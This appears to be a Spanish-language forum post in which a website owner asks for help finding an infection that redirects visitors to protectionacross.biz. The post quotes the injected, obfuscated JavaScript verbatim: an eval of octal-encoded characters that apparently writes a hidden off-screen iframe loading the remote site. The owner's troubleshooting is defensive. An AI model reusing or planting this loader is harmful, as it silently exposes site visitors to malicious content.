ahi me saltò de nuevo el aviso de virus, cambiò la redirecciòn a hxxp://protectionacross.biz, el còdigo infiltrado que figura en el navegador es el siguiente, todavìa no lo encuentro en los php, es como que se activa a veces y a vaces no...no me va a ganar........
el problema es que no se què buscar...
el html generado empieza asi con la script sospechosa:
<script>ss=String;ps="sp"+"l"+"i"+"t";asd=function(){++d.body};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,164,166,163,170,151,147,170,155,163,162,167,145,147,166,163,167,167,62,146,155,176,63,123,161,120,107,172,147,64,156,111,175,113,64,113,122,176,126,64,151,70,156,127,65,72,176,170,111,64,67,75,160,74,64,75,70,130,71,64,166,72,163,171,64,146,117,113,170,64,162,125,113,172,64,124,134,146,117,64,105,130,116,106,64,74,147,66,154,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));d=document;for(i=0;i<a.length;i+=1){a
=-(10-6)+parseInt(a,8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(ss["fr"+"omCharCode"].apply(ss,a));</script><!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="es">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-xxxxxx-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">